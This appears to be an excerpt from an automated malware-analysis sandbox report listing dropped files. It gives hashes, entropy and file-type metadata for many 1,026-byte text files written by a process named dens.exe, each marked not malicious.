                                                                                                                                                                                                                                            MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                            SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                            SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                            SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                            MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                            SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                            SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                            SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                            MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                            SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                            SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                            SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                            MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                            SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                            SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                            SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                            MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                            SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                            SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                            SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                            MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                            SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                            SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                            SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                            MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                            SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                            SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                            SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
